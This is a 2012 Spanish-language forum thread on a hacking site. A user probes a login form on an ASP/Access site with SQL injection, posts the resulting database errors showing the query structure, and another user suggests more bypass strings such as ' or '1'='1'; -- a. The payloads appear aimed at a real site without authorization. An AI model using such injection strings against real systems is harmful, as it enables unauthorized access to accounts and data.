Inicio
Buscar
Ingresar
Registrarse
Starfield: el juego que revolucionará el espacio y la tecnología
Hack x Crack - Comunidad de Seguridad informática
»
Seguridad Informatica
»
Hacking
»
Hacking web
»
sql injection duda
Imprimir
Páginas: [
1
]
Ir Abajo
Autor
Tema: sql injection duda (Leído 2603 veces)
muten roshi
{ L2 } Nativo Digital
Mensajes: 86
Todos somos muy ignorantes. Lo que ocurre es que..
sql injection duda
«
en:
Diciembre 08, 2012, 09:40:06 pm »
hola amigos!!
Probando sql injection en un formulario pongo:
user:admin
pass:'
con eso me sale este mensaje ------->
Microsoft OLE DB Provider for ODBC Drivers
error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'USU_USUARIO='admin' and USU_PASSWORD=''''.
/permisos.asp
, line 10
es vulnerable a sql injection
pruebo luego
user:admin
pass:' or '1'='1
me pone su nombre o password no son correctos
deberia de intentar con otras injecciones o como lo veis
aparte de ' or '1'='1 cuales puedo probar?
saludos
En línea
kid_goth
{ L7 } Juanker
Mensajes: 1456
El Conocimiento se Limita Cuando dices NO PUEDO
Re:sql injection duda
«
Respuesta #1 en:
Diciembre 08, 2012, 10:02:06 pm »
talves pasa por md5 o algun otro cifrado la pass, prueba a poner solo ' or '1'='1'; -- a en el usuario y la pass dejala en blanco o lo que sea... o si no despues prueba lo mismo pero con limit tal ves compra que retorne solo un valor
saludos
En línea
Cuando la percepción de vida que tienes encuentra en si que la muerte es inevitable y lo aceptas con humildad y agrado, es cuando realmente empiezas a amar la vida y adorar la muerte.
muten roshi
{ L2 } Nativo Digital
Mensajes: 86
Todos somos muy ignorantes. Lo que ocurre es que..
Re:sql injection duda
«
Respuesta #2 en:
Diciembre 08, 2012, 10:30:08 pm »
hola kid
si introduzco
user: ' or '1'='1'; -- a
pass: en blanco
me sale esto
Microsoft OLE DB Provider for ODBC Drivers
error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Characters found after end of SQL statement.
/permisos.asp
, line 10
como lo ves
En línea
muten roshi
{ L2 } Nativo Digital
Mensajes: 86
Todos somos muy ignorantes. Lo que ocurre es que..
Re:sql injection duda
«
Respuesta #3 en:
Diciembre 08, 2012, 11:04:54 pm »
si introduzco
user:' or '1'='1'limit 0,1;--a
pass:en blanco
tampoco mejora
Microsoft OLE DB Provider for ODBC Drivers
error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'USU_USUARIO='' or '1'='1'limit 0,1'.
/permisos.asp
, line 10
En línea
Imprimir
Páginas: [
1
]
Ir Arriba
Hack x Crack - Comunidad de Seguridad informática
»
Seguridad Informatica
»
Hacking
»
Hacking web
»
sql injection duda
Va un mudo y le dice a un sordo: Hack x Crack usa cookies. Pues eso...
OK
Learn more